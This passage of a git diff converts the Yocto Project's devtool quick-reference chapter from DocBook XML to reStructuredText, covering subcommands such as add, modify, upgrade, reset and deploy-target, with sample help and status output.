+ -q, --quiet Print only errors
+ --color COLOR Colorize output (where COLOR is auto, always, never)
+ -h, --help show this help message and exit
+
+ subcommands:
+ Beginning work on a recipe:
+ add Add a new recipe
+ modify Modify the source for an existing recipe
+ upgrade Upgrade an existing recipe
+ Getting information:
+ status Show workspace status
+ latest-version Report the latest version of an existing recipe
+ check-upgrade-status Report upgradability for multiple (or all) recipes
+ search Search available recipes
+ Working on a recipe in the workspace:
+ build Build a recipe
+ rename Rename a recipe file in the workspace
+ edit-recipe Edit a recipe file
+ find-recipe Find a recipe file
+ configure-help Get help on configure script options
+ update-recipe Apply changes from external source tree to recipe
+ reset Remove a recipe from your workspace
+ finish Finish working on a recipe in your workspace
+ Testing changes on target:
+ deploy-target Deploy recipe output files to live target machine
+ undeploy-target Undeploy recipe output files in live target machine
+ build-image Build image including workspace recipe packages
+ Advanced:
+ create-workspace Set up workspace in an alternative location
+ extract Extract the source for an existing recipe
+ sync Synchronize the source tree for an existing recipe
+ menuconfig Alter build-time configuration for a recipe
+ import Import exported tar archive into workspace
+ export Export workspace into a tar archive
+ other:
+ selftest-reverse Reverse value (for selftest)
+ pluginfile Print the filename of this plugin
+ bbdir Print the BBPATH directory of this plugin
+ count How many times have this plugin been registered.
+ multiloaded How many times have this plugin been initialized
+ Use devtool <subcommand> --help to get help on a specific command
+
+As directed in the general help output, you can
+get more syntax on a specific command by providing the command name and
+using "--help":
+::
+
+ $ devtool add --help
+ NOTE: Starting bitbake server...
+ usage: devtool add [-h] [--same-dir | --no-same-dir] [--fetch URI] [--npm-dev] [--version VERSION] [--no-git] [--srcrev SRCREV | --autorev] [--srcbranch SRCBRANCH] [--binary] [--also-native] [--src-subdir SUBDIR] [--mirrors]
+ [--provides PROVIDES]
+ [recipename] [srctree] [fetchuri]
+
+ Adds a new recipe to the workspace to build a specified source tree. Can optionally fetch a remote URI and unpack it to create the source tree.
+
+ arguments:
+ recipename Name for new recipe to add (just name - no version, path or extension). If not specified, will attempt to auto-detect it.
+ srctree Path to external source tree. If not specified, a subdirectory of /media/build1/poky/build/workspace/sources will be used.
+ fetchuri Fetch the specified URI and extract it to create the source tree
+
+ options:
+ -h, --help show this help message and exit
+ --same-dir, -s Build in same directory as source
+ --no-same-dir Force build in a separate build directory
+ --fetch URI, -f URI Fetch the specified URI and extract it to create the source tree (deprecated - pass as positional argument instead)
+ --npm-dev For npm, also fetch devDependencies
+ --version VERSION, -V VERSION
+ Version to use within recipe (PV)
+ --no-git, -g If fetching source, do not set up source tree as a git repository
+ --srcrev SRCREV, -S SRCREV
+ Source revision to fetch if fetching from an SCM such as git (default latest)
+ --autorev, -a When fetching from a git repository, set SRCREV in the recipe to a floating revision instead of fixed
+ --srcbranch SRCBRANCH, -B SRCBRANCH
+ Branch in source repository if fetching from an SCM such as git (default master)
+ --binary, -b Treat the source tree as something that should be installed verbatim (no compilation, same directory structure). Useful with binary packages e.g. RPMs.
+ --also-native Also add native variant (i.e. support building recipe for the build host as well as the target machine)
+ --src-subdir SUBDIR Specify subdirectory within source tree to use
+ --mirrors Enable PREMIRRORS and MIRRORS for source tree fetching (disable by default).
+ --provides PROVIDES, -p PROVIDES
+ Specify an alias for the item provided by the recipe. E.g. virtual/libgl
+
+.. _devtool-the-workspace-layer-structure:
+
+The Workspace Layer Structure
+=============================
+
+``devtool`` uses a "Workspace" layer in which to accomplish builds. This
+layer is not specific to any single ``devtool`` command but is rather a
+common working area used across the tool.
+
+The following figure shows the workspace structure:
+
+.. image:: figures/build-workspace-directory.png
+ :align: center
+ :scale: 70%
+
+.. code-block:: none
+
+ attic - A directory created if devtool believes it must preserve
+ anything when you run "devtool reset". For example, if you
+ run "devtool add", make changes to the recipe, and then
+ run "devtool reset", devtool takes notice that the file has
+ been changed and moves it into the attic should you still
+ want the recipe.
+
+ README - Provides information on what is in workspace layer and how to
+ manage it.
+
+ .devtool_md5 - A checksum file used by devtool.
+
+ appends - A directory that contains *.bbappend files, which point to
+ external source.
+
+ conf - A configuration directory that contains the layer.conf file.
+
+ recipes - A directory containing recipes. This directory contains a
+ folder for each directory added whose name matches that of the
+ added recipe. devtool places the recipe.bb file
+ within that sub-directory.
+
+ sources - A directory containing a working copy of the source files used
+ when building the recipe. This is the default directory used
+ as the location of the source tree when you do not provide a
+ source tree path. This directory contains a folder for each
+ set of source files matched to a corresponding recipe.
+
+.. _devtool-adding-a-new-recipe-to-the-workspace:
+
+Adding a New Recipe to the Workspace Layer
+==========================================
+
+Use the ``devtool add`` command to add a new recipe to the workspace
+layer. The recipe you add should not exist - ``devtool`` creates it for
+you. The source files the recipe uses should exist in an external area.
+
+The following example creates and adds a new recipe named ``jackson`` to
+a workspace layer the tool creates. The source code built by the recipes
+resides in ``/home/user/sources/jackson``:
+::
+
+ $ devtool add jackson /home/user/sources/jackson
+
+If you add a recipe and the workspace layer does not exist, the command
+creates the layer and populates it as described in "`The Workspace Layer
+Structure <#devtool-the-workspace-layer-structure>`__" section.
+
+Running ``devtool add`` when the workspace layer exists causes the tool
+to add the recipe, append files, and source files into the existing
+workspace layer. The ``.bbappend`` file is created to point to the
+external source tree.
+
+.. note::
+
+ If your recipe has runtime dependencies defined, you must be sure
+ that these packages exist on the target hardware before attempting to
+ run your application. If dependent packages (e.g. libraries) do not
+ exist on the target, your application, when run, will fail to find
+ those functions. For more information, see the
+ ":ref:`ref-manual/ref-devtool-reference:deploying your software on the target machine`"
+ section.
+
+By default, ``devtool add`` uses the latest revision (i.e. master) when
+unpacking files from a remote URI. In some cases, you might want to
+specify a source revision by branch, tag, or commit hash. You can
+specify these options when using the ``devtool add`` command:
+
+- To specify a source branch, use the ``--srcbranch`` option:
+ ::
+
+ $ devtool add --srcbranch DISTRO_NAME_NO_CAP jackson /home/user/sources/jackson
+
+ In the previous example, you are checking out the DISTRO_NAME_NO_CAP
+ branch.
+
+- To specify a specific tag or commit hash, use the ``--srcrev``
+ option:
+ ::
+
+ $ devtool add --srcrev DISTRO_REL_TAG jackson /home/user/sources/jackson
+ $ devtool add --srcrev some_commit_hash /home/user/sources/jackson
+
+ The previous examples check out the
+ DISTRO_REL_TAG tag and the commit associated with the
+ some_commit_hash hash.
+
+.. note::
+
+ If you prefer to use the latest revision every time the recipe is
+ built, use the options ``--autorev`` or ``-a``.
+
+.. _devtool-extracting-the-source-for-an-existing-recipe:
+
+Extracting the Source for an Existing Recipe
+============================================
+
+Use the ``devtool extract`` command to extract the source for an
+existing recipe. When you use this command, you must supply the root
+name of the recipe (i.e. no version, paths, or extensions), and you must
+supply the directory to which you want the source extracted.
+
+Additional command options let you control the name of a development
+branch into which you can checkout the source and whether or not to keep
+a temporary directory, which is useful for debugging.
+
+.. _devtool-synchronizing-a-recipes-extracted-source-tree:
+
+Synchronizing a Recipe's Extracted Source Tree
+==============================================
+
+Use the ``devtool sync`` command to synchronize a previously extracted
+source tree for an existing recipe. When you use this command, you must
+supply the root name of the recipe (i.e. no version, paths, or
+extensions), and you must supply the directory to which you want the
+source extracted.
+
+Additional command options let you control the name of a development
+branch into which you can checkout the source and whether or not to keep
+a temporary directory, which is useful for debugging.
+
+.. _devtool-modifying-a-recipe:
+
+Modifying an Existing Recipe
+============================
+
+Use the ``devtool modify`` command to begin modifying the source of an
+existing recipe. This command is very similar to the
+:ref:`add <devtool-adding-a-new-recipe-to-the-workspace>` command
+except that it does not physically create the recipe in the workspace
+layer because the recipe already exists in an another layer.
+
+The ``devtool modify`` command extracts the source for a recipe, sets it
+up as a Git repository if the source had not already been fetched from
+Git, checks out a branch for development, and applies any patches from
+the recipe as commits on top. You can use the following command to
+checkout the source files:
+::
+
+ $ devtool modify recipe
+
+Using the above command form, ``devtool`` uses the existing recipe's
+:term:`SRC_URI` statement to locate the upstream source,
+extracts the source into the default sources location in the workspace.
+The default development branch used is "devtool".
+
+.. _devtool-edit-an-existing-recipe:
+
+Edit an Existing Recipe
+=======================
+
+Use the ``devtool edit-recipe`` command to run the default editor, which
+is identified using the ``EDITOR`` variable, on the specified recipe.
+
+When you use the ``devtool edit-recipe`` command, you must supply the
+root name of the recipe (i.e. no version, paths, or extensions). Also,
+the recipe file itself must reside in the workspace as a result of the
+``devtool add`` or ``devtool upgrade`` commands. However, you can
+override that requirement by using the "-a" or "--any-recipe" option.
+Using either of these options allows you to edit any recipe regardless
+of its location.
+
+.. _devtool-updating-a-recipe:
+
+Updating a Recipe
+=================
+
+Use the ``devtool update-recipe`` command to update your recipe with
+patches that reflect changes you make to the source files. For example,
+if you know you are going to work on some code, you could first use the
+:ref:`devtool modify <devtool-modifying-a-recipe>` command to extract
+the code and set up the workspace. After which, you could modify,
+compile, and test the code.
+
+When you are satisfied with the results and you have committed your
+changes to the Git repository, you can then run the
+``devtool update-recipe`` to create the patches and update the recipe:
+::
+
+ $ devtool update-recipe recipe
+
+If you run the ``devtool update-recipe``
+without committing your changes, the command ignores the changes.
+
+Often, you might want to apply customizations made to your software in
+your own layer rather than apply them to the original recipe. If so, you
+can use the ``-a`` or ``--append`` option with the
+``devtool update-recipe`` command. These options allow you to specify
+the layer into which to write an append file:
+::
+
+ $ devtool update-recipe recipe -a base-layer-directory
+
+The ``*.bbappend`` file is created at the
+appropriate path within the specified layer directory, which may or may
+not be in your ``bblayers.conf`` file. If an append file already exists,
+the command updates it appropriately.
+
+.. _devtool-checking-on-the-upgrade-status-of-a-recipe:
+
+Checking on the Upgrade Status of a Recipe
+==========================================
+
+Upstream recipes change over time. Consequently, you might find that you
+need to determine if you can upgrade a recipe to a newer version.
+
+To check on the upgrade status of a recipe, use the
+``devtool check-upgrade-status`` command. The command displays a table
+of your current recipe versions, the latest upstream versions, the email
+address of the recipe's maintainer, and any additional information such
+as commit hash strings and reasons you might not be able to upgrade a
+particular recipe.
+
+.. note::
+
+ - For the ``oe-core`` layer, recipe maintainers come from the
+ `maintainers.inc <http://git.yoctoproject.org/cgit/cgit.cgi/poky/tree/meta/conf/distro/include/maintainers.inc>`_
+ file.
+
+ - If the recipe is using the :ref:`bitbake:git-fetcher`
+ rather than a
+ tarball, the commit hash points to the commit that matches the
+ recipe's latest version tag.
+
+As with all ``devtool`` commands, you can get help on the individual
+command:
+::
+
+ $ devtool check-upgrade-status -h
+ NOTE: Starting bitbake server...
+ usage: devtool check-upgrade-status [-h] [--all] [recipe [recipe ...]]
+
+ Prints a table of recipes together with versions currently provided by recipes, and latest upstream versions, when there is a later version available
+
+ arguments:
+ recipe Name of the recipe to report (omit to report upgrade info for all recipes)
+
+ options:
+ -h, --help show this help message and exit
+ --all, -a Show all recipes, not just recipes needing upgrade
+
+Unless you provide a specific recipe name on the command line, the
+command checks all recipes in all configured layers.
+
+Following is a partial example table that reports on all the recipes.
+Notice the reported reason for not upgrading the ``base-passwd`` recipe.
+In this example, while a new version is available upstream, you do not
+want to use it because the dependency on ``cdebconf`` is not easily
+satisfied.
+
+.. note::
+
+ When a reason for not upgrading displays, the reason is usually
+ written into the recipe using the ``RECIPE_NO_UPDATE_REASON``
+ variable. See the
+ :yocto_git:`base-passwd.bb </cgit/cgit.cgi/poky/tree/meta/recipes-core/base-passwd/base-passwd_3.5.29.bb>`
+ recipe for an example.
+
+::
+
+ $ devtool check-upgrade-status
+ ...
+ NOTE: acpid 2.0.30 2.0.31 Ross Burton <ross.burton@intel.com>
+ NOTE: u-boot-fw-utils 2018.11 2019.01 Marek Vasut <marek.vasut@gmail.com> d3689267f92c5956e09cc7d1baa4700141662bff
+ NOTE: u-boot-tools 2018.11 2019.01 Marek Vasut <marek.vasut@gmail.com> d3689267f92c5956e09cc7d1baa4700141662bff
+ .
+ .
+ .
+ NOTE: base-passwd 3.5.29 3.5.45 Anuj Mittal <anuj.mittal@intel.com> cannot be updated due to: Version 3.5.38 requires cdebconf for update-passwd utility
+ NOTE: busybox 1.29.2 1.30.0 Andrej Valek <andrej.valek@siemens.com>
+ NOTE: dbus-test 1.12.10 1.12.12 Chen Qi <Qi.Chen@windriver.com>
+
+.. _devtool-upgrading-a-recipe:
+
+Upgrading a Recipe
+==================
+
+As software matures, upstream recipes are upgraded to newer versions. As
+a developer, you need to keep your local recipes up-to-date with the
+upstream version releases. Several methods exist by which you can
+upgrade recipes. You can read about them in the ":ref:`gs-upgrading-recipes`"
+section of the Yocto Project Development Tasks Manual. This section
+overviews the ``devtool upgrade`` command.
+
+Before you upgrade a recipe, you can check on its upgrade status. See
+the ":ref:`devtool-checking-on-the-upgrade-status-of-a-recipe`" section
+for more information.
+
+The ``devtool upgrade`` command upgrades an existing recipe to a more
+recent version of the recipe upstream. The command puts the upgraded
+recipe file along with any associated files into a "workspace" and, if
+necessary, extracts the source tree to a specified location. During the
+upgrade, patches associated with the recipe are rebased or added as
+needed.
+
+When you use the ``devtool upgrade`` command, you must supply the root
+name of the recipe (i.e. no version, paths, or extensions), and you must
+supply the directory to which you want the source extracted. Additional
+command options let you control things such as the version number to
+which you want to upgrade (i.e. the :term:`PV`), the source
+revision to which you want to upgrade (i.e. the
+:term:`SRCREV`), whether or not to apply patches, and so
+forth.
+
+You can read more on the ``devtool upgrade`` workflow in the
+":ref:`sdk-devtool-use-devtool-upgrade-to-create-a-version-of-the-recipe-that-supports-a-newer-version-of-the-software`"
+section in the Yocto Project Application Development and the Extensible
+Software Development Kit (eSDK) manual. You can also see an example of
+how to use ``devtool upgrade`` in the ":ref:`gs-using-devtool-upgrade`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _devtool-resetting-a-recipe:
+
+Resetting a Recipe
+==================
+
+Use the ``devtool reset`` command to remove a recipe and its
+configuration (e.g. the corresponding ``.bbappend`` file) from the
+workspace layer. Realize that this command deletes the recipe and the
+append file. The command does not physically move them for you.
+Consequently, you must be sure to physically relocate your updated
+recipe and the append file outside of the workspace layer before running
+the ``devtool reset`` command.
+
+If the ``devtool reset`` command detects that the recipe or the append
+files have been modified, the command preserves the modified files in a
+separate "attic" subdirectory under the workspace layer.
+
+Here is an example that resets the workspace directory that contains the
+``mtr`` recipe:
+::
+
+ $ devtool reset mtr
+ NOTE: Cleaning sysroot for recipe mtr...
+ NOTE: Leaving source tree /home/scottrif/poky/build/workspace/sources/mtr as-is; if you no longer need it then please delete it manually
+ $
+
+.. _devtool-building-your-recipe:
+
+Building Your Recipe
+====================
+
+Use the ``devtool build`` command to build your recipe. The
+``devtool build`` command is equivalent to the
+``bitbake -c populate_sysroot`` command.
+
+When you use the ``devtool build`` command, you must supply the root
+name of the recipe (i.e. do not provide versions, paths, or extensions).
+You can use either the "-s" or the "--disable-parallel-make" options to
+disable parallel makes during the build. Here is an example:
+::
+
+ $ devtool build recipe
+
+.. _devtool-building-your-image:
+
+Building Your Image
+===================
+
+Use the ``devtool build-image`` command to build an image, extending it
+to include packages from recipes in the workspace. Using this command is
+useful when you want an image that ready for immediate deployment onto a
+device for testing. For proper integration into a final image, you need
+to edit your custom image recipe appropriately.
+
+When you use the ``devtool build-image`` command, you must supply the
+name of the image. This command has no command line options:
+::
+
+ $ devtool build-image image
+
+.. _devtool-deploying-your-software-on-the-target-machine:
+
+Deploying Your Software on the Target Machine
+=============================================
+
+Use the ``devtool deploy-target`` command to deploy the recipe's build
+output to the live target machine:
+::
+
+ $ devtool deploy-target recipe target
+
+The target is the address of the target machine, which must be running
+an SSH server (i.e. ``user@hostname[:destdir]``).
+
+This command deploys all files installed during the
+:ref:`ref-tasks-install` task. Furthermore, you do not
+need to have package management enabled within the target machine. If
+you do, the package manager is bypassed.
+
+.. note::
+
+ The ``deploy-target`` functionality is for development only. You
+ should never use it to update an image that will be used in
+ production.
+
+Some conditions exist that could prevent a deployed application from
+behaving as expected. When both of the following conditions exist, your
+application has the potential to not behave correctly when run on the
+target:
+
+- You are deploying a new application to the target and the recipe you
+ used to build the application had correctly defined runtime
+ dependencies.
+
+- The target does not physically have the packages on which the
+ application depends installed.
+
+If both of these conditions exist, your application will not behave as
+expected. The reason for this misbehavior is because the
+``devtool deploy-target`` command does not deploy the packages (e.g.
+libraries) on which your new application depends. The assumption is that
+the packages are already on the target. Consequently, when a runtime
+call is made in the application for a dependent function (e.g. a library
+call), the function cannot be found.
+
+To be sure you have all the dependencies local to the target, you need
+to be sure that the packages are pre-deployed (installed) on the target
+before attempting to run your application.
+
+.. _devtool-removing-your-software-from-the-target-machine:
+
+Removing Your Software from the Target Machine
+==============================================
+
+Use the ``devtool undeploy-target`` command to remove deployed build
+output from the target machine. For the ``devtool undeploy-target``
+command to work, you must have previously used the
+":ref:`devtool deploy-target <ref-manual/ref-devtool-reference:deploying your software on the target machine>`"
+command.
+::
+
+ $ devtool undeploy-target recipe target
+
+The target is the
+address of the target machine, which must be running an SSH server (i.e.
+``user@hostname``).
+
+.. _devtool-creating-the-workspace:
+
+Creating the Workspace Layer in an Alternative Location
+=======================================================
+
+Use the ``devtool create-workspace`` command to create a new workspace
+layer in your :term:`Build Directory`. When you create a
+new workspace layer, it is populated with the ``README`` file and the
+``conf`` directory only.
+
+The following example creates a new workspace layer in your current
+working and by default names the workspace layer "workspace":
+::
+
+ $ devtool create-workspace
+
+You can create a workspace layer anywhere by supplying a pathname with
+the command. The following command creates a new workspace layer named
+"new-workspace":
+::
+
+ $ devtool create-workspace /home/scottrif/new-workspace
+
+.. _devtool-get-the-status-of-the-recipes-in-your-workspace:
+
+Get the Status of the Recipes in Your Workspace
+===============================================
+
+Use the ``devtool status`` command to list the recipes currently in your
+workspace. Information includes the paths to their respective external
+source trees.
+
+The ``devtool status`` command has no command-line options:
+::
+
+ $ devtool status
+
+Following is sample output after using
+:ref:`devtool add <ref-manual/ref-devtool-reference:adding a new recipe to the workspace layer>`
+to create and add the ``mtr_0.86.bb`` recipe to the ``workspace`` directory:
+::
+
+ $ devtool status
+ mtr:/home/scottrif/poky/build/workspace/sources/mtr (/home/scottrif/poky/build/workspace/recipes/mtr/mtr_0.86.bb)
+ $
+
+.. _devtool-search-for-available-target-recipes:
+
+Search for Available Target Recipes
+===================================
+
+Use the ``devtool search`` command to search for available target
+recipes. The command matches the recipe name, package name, description,
+and installed files. The command displays the recipe name as a result of
+a match.
+
+When you use the ``devtool search`` command, you must supply a keyword.
+The command uses the keyword when searching for a match.
diff --git a/documentation/ref-manual/ref-devtool-reference.xml b/documentation/ref-manual/ref-devtool-reference.xml
deleted file mode 100644
index 11f7399c5a..0000000000
--- a/documentation/ref-manual/ref-devtool-reference.xml
+++ /dev/null
@@ -1,841 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='ref-devtool-reference'>
- <title><filename>devtool</filename> Quick Reference</title>
-
- <para>
- The <filename>devtool</filename> command-line tool provides a number
- of features that help you build, test, and package software.
- This command is available alongside the <filename>bitbake</filename>
- command.
- Additionally, the <filename>devtool</filename> command is a key
- part of the extensible SDK.
- </para>
-
- <para>
- This chapter provides a Quick Reference for the
- <filename>devtool</filename> command.
- For more information on how to apply the command when using the
- extensible SDK, see the
- "<ulink url='&YOCTO_DOCS_SDK_URL;#sdk-extensible'>Using the Extensible SDK</ulink>"
- chapter in the Yocto Project Application Development and the
- Extensible Software Development Kit (eSDK) manual.
- </para>
-
- <section id='devtool-getting-help'>
- <title>Getting Help</title>
-
- <para>
- The <filename>devtool</filename> command line is organized
- similarly to Git in that it has a number of sub-commands for
- each function.
- You can run <filename>devtool --help</filename> to see all
- the commands:
- <literallayout class='monospaced'>
- $ devtool -h
- NOTE: Starting bitbake server...
- usage: devtool [--basepath BASEPATH] [--bbpath BBPATH] [-d] [-q]
- [--color COLOR] [-h]
- &lt;subcommand&gt; ...
-
- OpenEmbedded development tool
-
- options:
- --basepath BASEPATH Base directory of SDK / build directory
- --bbpath BBPATH Explicitly specify the BBPATH, rather than getting it
- from the metadata
- -d, --debug Enable debug output
- -q, --quiet Print only errors
- --color COLOR Colorize output (where COLOR is auto, always, never)
- -h, --help show this help message and exit
-
- subcommands:
- Beginning work on a recipe:
- add Add a new recipe
- modify Modify the source for an existing recipe
- upgrade Upgrade an existing recipe
- Getting information:
- status Show workspace status
- search Search available recipes
- latest-version Report the latest version of an existing recipe
- check-upgrade-status Report upgradability for multiple (or all) recipes
- Working on a recipe in the workspace:
- build Build a recipe
- rename Rename a recipe file in the workspace
- edit-recipe Edit a recipe file
- find-recipe Find a recipe file
- configure-help Get help on configure script options
- update-recipe Apply changes from external source tree to recipe
- reset Remove a recipe from your workspace
- finish Finish working on a recipe in your workspace
- Testing changes on target:
- deploy-target Deploy recipe output files to live target machine
- undeploy-target Undeploy recipe output files in live target machine
- build-image Build image including workspace recipe packages
- Advanced:
- create-workspace Set up workspace in an alternative location
- export Export workspace into a tar archive
- import Import exported tar archive into workspace
- extract Extract the source for an existing recipe
- sync Synchronize the source tree for an existing recipe
- Use devtool &lt;subcommand&gt; --help to get help on a specific command
- </literallayout>
- As directed in the general help output, you can get more syntax
- on a specific command by providing the command name and using
- "--help":
- <literallayout class='monospaced'>
- $ devtool add --help
- NOTE: Starting bitbake server...
- usage: devtool add [-h] [--same-dir | --no-same-dir] [--fetch URI]
- [--fetch-dev] [--version VERSION] [--no-git]
- [--srcrev SRCREV | --autorev] [--srcbranch SRCBRANCH]
- [--binary] [--also-native] [--src-subdir SUBDIR]
- [--mirrors] [--provides PROVIDES]
- [recipename] [srctree] [fetchuri]
-
- Adds a new recipe to the workspace to build a specified source tree. Can
- optionally fetch a remote URI and unpack it to create the source tree.
-
- arguments:
- recipename Name for new recipe to add (just name - no version,
- path or extension). If not specified, will attempt to
- auto-detect it.
- srctree Path to external source tree. If not specified, a
- subdirectory of
- /home/scottrif/poky/build/workspace/sources will be
- used.
- fetchuri Fetch the specified URI and extract it to create the
- source tree
-
- options:
- -h, --help show this help message and exit
- --same-dir, -s Build in same directory as source
- --no-same-dir Force build in a separate build directory
- --fetch URI, -f URI Fetch the specified URI and extract it to create the
- source tree (deprecated - pass as positional argument
- instead)
- --fetch-dev For npm, also fetch devDependencies
- --version VERSION, -V VERSION
- Version to use within recipe (PV)
- --no-git, -g If fetching source, do not set up source tree as a git
- repository
- --srcrev SRCREV, -S SRCREV
- Source revision to fetch if fetching from an SCM such
- as git (default latest)
- --autorev, -a When fetching from a git repository, set SRCREV in the
- recipe to a floating revision instead of fixed
- --srcbranch SRCBRANCH, -B SRCBRANCH
- Branch in source repository if fetching from an SCM
- such as git (default master)
- --binary, -b Treat the source tree as something that should be
- installed verbatim (no compilation, same directory
- structure). Useful with binary packages e.g. RPMs.
- --also-native Also add native variant (i.e. support building recipe
- for the build host as well as the target machine)
- --src-subdir SUBDIR Specify subdirectory within source tree to use
- --mirrors Enable PREMIRRORS and MIRRORS for source tree fetching
- (disable by default).
- --provides PROVIDES, -p PROVIDES
- Specify an alias for the item provided by the recipe.
- E.g. virtual/libgl
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-the-workspace-layer-structure'>
- <title>The Workspace Layer Structure</title>
-
- <para>
- <filename>devtool</filename> uses a "Workspace" layer
- in which to accomplish builds.
- This layer is not specific to any single
- <filename>devtool</filename> command but is rather a common
- working area used across the tool.
- </para>
-
- <para>
- The following figure shows the workspace structure:
- </para>
-
- <para>
- <imagedata fileref="figures/build-workspace-directory.png"
- width="6in" depth="5in" align="left" scale="70" />
- </para>
-
- <para>
- <literallayout class='monospaced'>
- attic - A directory created if devtool believes it must preserve
- anything when you run "devtool reset". For example, if you
- run "devtool add", make changes to the recipe, and then
- run "devtool reset", devtool takes notice that the file has
- been changed and moves it into the attic should you still
- want the recipe.
-
- README - Provides information on what is in workspace layer and how to
- manage it.
-
- .devtool_md5 - A checksum file used by devtool.
-
- appends - A directory that contains *.bbappend files, which point to
- external source.
-
- conf - A configuration directory that contains the layer.conf file.
-
- recipes - A directory containing recipes. This directory contains a
- folder for each directory added whose name matches that of the
- added recipe. devtool places the <replaceable>recipe</replaceable>.bb file
- within that sub-directory.
-
- sources - A directory containing a working copy of the source files used
- when building the recipe. This is the default directory used
- as the location of the source tree when you do not provide a
- source tree path. This directory contains a folder for each
- set of source files matched to a corresponding recipe.
- </literallayout>
- </para>
- </section>
-
- <section id='devtool-adding-a-new-recipe-to-the-workspace'>
- <title>Adding a New Recipe to the Workspace Layer</title>
-
- <para>
- Use the <filename>devtool add</filename> command to add a new recipe
- to the workspace layer.
- The recipe you add should not exist -
- <filename>devtool</filename> creates it for you.
- The source files the recipe uses should exist in an external
- area.
- </para>
-
- <para>
- The following example creates and adds a new recipe named
- <filename>jackson</filename> to a workspace layer the tool creates.
- The source code built by the recipes resides in
- <filename>/home/<replaceable>user</replaceable>/sources/jackson</filename>:
- <literallayout class='monospaced'>
- $ devtool add jackson /home/<replaceable>user</replaceable>/sources/jackson
- </literallayout>
- </para>
-
- <para>
- If you add a recipe and the workspace layer does not exist,
- the command creates the layer and populates it as
- described in
- "<link linkend='devtool-the-workspace-layer-structure'>The Workspace Layer Structure</link>"
- section.
- </para>
-
- <para>
- Running <filename>devtool add</filename> when the
- workspace layer exists causes the tool to add the recipe,
- append files, and source files into the existing workspace layer.
- The <filename>.bbappend</filename> file is created to point
- to the external source tree.
- <note>
- If your recipe has runtime dependencies defined, you must be sure
- that these packages exist on the target hardware before attempting
- to run your application.
- If dependent packages (e.g. libraries) do not exist on the target,
- your application, when run, will fail to find those functions.
- For more information, see the
- "<link linkend='devtool-deploying-your-software-on-the-target-machine'>Deploying Your Software on the Target Machine</link>"
- section.
- </note>
- </para>
-
- <para>
- By default, <filename>devtool add</filename> uses the latest
- revision (i.e. master) when unpacking files from a remote URI.
- In some cases, you might want to specify a source revision by
- branch, tag, or commit hash. You can specify these options when
- using the <filename>devtool add</filename> command:
- <itemizedlist>
- <listitem><para>
- To specify a source branch, use the
- <filename>--srcbranch</filename> option:
- <literallayout class='monospaced'>
- $ devtool add --srcbranch &DISTRO_NAME_NO_CAP; jackson /home/<replaceable>user</replaceable>/sources/jackson
- </literallayout>
- In the previous example, you are checking out the
- &DISTRO_NAME_NO_CAP; branch.
- </para></listitem>
- <listitem><para>
- To specify a specific tag or commit hash, use the
- <filename>--srcrev</filename> option:
- <literallayout class='monospaced'>
- $ devtool add --srcrev &DISTRO_REL_TAG; jackson /home/<replaceable>user</replaceable>/sources/jackson
- $ devtool add --srcrev <replaceable>some_commit_hash</replaceable> /home/<replaceable>user</replaceable>/sources/jackson
- </literallayout>
- The previous examples check out the &DISTRO_REL_TAG; tag
- and the commit associated with the
- <replaceable>some_commit_hash</replaceable> hash.
- </para></listitem>
- </itemizedlist>
- <note>
- If you prefer to use the latest revision every time the recipe is
- built, use the options <filename>--autorev</filename>
- or <filename>-a</filename>.
- </note>
- </para>
- </section>
-
- <section id='devtool-extracting-the-source-for-an-existing-recipe'>
- <title>Extracting the Source for an Existing Recipe</title>
-
- <para>
- Use the <filename>devtool extract</filename> command to
- extract the source for an existing recipe.
- When you use this command, you must supply the root name
- of the recipe (i.e. no version, paths, or extensions), and
- you must supply the directory to which you want the source
- extracted.
- </para>
-
- <para>
- Additional command options let you control the name of a
- development branch into which you can checkout the source
- and whether or not to keep a temporary directory, which is
- useful for debugging.
- </para>
- </section>
-
- <section id='devtool-synchronizing-a-recipes-extracted-source-tree'>
- <title>Synchronizing a Recipe's Extracted Source Tree</title>
-
- <para>
- Use the <filename>devtool sync</filename> command to
- synchronize a previously extracted source tree for an
- existing recipe.
- When you use this command, you must supply the root name
- of the recipe (i.e. no version, paths, or extensions), and
- you must supply the directory to which you want the source
- extracted.
- </para>
-
- <para>
- Additional command options let you control the name of a
- development branch into which you can checkout the source
- and whether or not to keep a temporary directory, which is
- useful for debugging.
- </para>
- </section>
-
- <section id='devtool-modifying-a-recipe'>
- <title>Modifying an Existing Recipe</title>
-
- <para>
- Use the <filename>devtool modify</filename> command to begin
- modifying the source of an existing recipe.
- This command is very similar to the
- <link linkend='devtool-adding-a-new-recipe-to-the-workspace'><filename>add</filename></link>
- command except that it does not physically create the
- recipe in the workspace layer because the recipe already
- exists in an another layer.
- </para>
-
- <para>
- The <filename>devtool modify</filename> command extracts the
- source for a recipe, sets it up as a Git repository if the
- source had not already been fetched from Git, checks out a
- branch for development, and applies any patches from the recipe
- as commits on top.
- You can use the following command to checkout the source
- files:
- <literallayout class='monospaced'>
- $ devtool modify <replaceable>recipe</replaceable>
- </literallayout>
- Using the above command form, <filename>devtool</filename> uses
- the existing recipe's
- <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
- statement to locate the upstream source, extracts the source
- into the default sources location in the workspace.
- The default development branch used is "devtool".
- </para>
- </section>
-
- <section id='devtool-edit-an-existing-recipe'>
- <title>Edit an Existing Recipe</title>
-
- <para>
- Use the <filename>devtool edit-recipe</filename> command
- to run the default editor, which is identified using the
- <filename>EDITOR</filename> variable, on the specified recipe.
- </para>
-
- <para>
- When you use the <filename>devtool edit-recipe</filename>
- command, you must supply the root name of the recipe
- (i.e. no version, paths, or extensions).
- Also, the recipe file itself must reside in the workspace
- as a result of the <filename>devtool add</filename> or
- <filename>devtool upgrade</filename> commands.
- However, you can override that requirement by using the
- "-a" or "--any-recipe" option.
- Using either of these options allows you to edit any recipe
- regardless of its location.
- </para>
- </section>
-
- <section id='devtool-updating-a-recipe'>
- <title>Updating a Recipe</title>
-
- <para>
- Use the <filename>devtool update-recipe</filename> command to
- update your recipe with patches that reflect changes you make
- to the source files.
- For example, if you know you are going to work on some
- code, you could first use the
- <link linkend='devtool-modifying-a-recipe'><filename>devtool modify</filename></link>
- command to extract the code and set up the workspace.
- After which, you could modify, compile, and test the code.
- </para>
-
- <para>
- When you are satisfied with the results and you have committed
- your changes to the Git repository, you can then
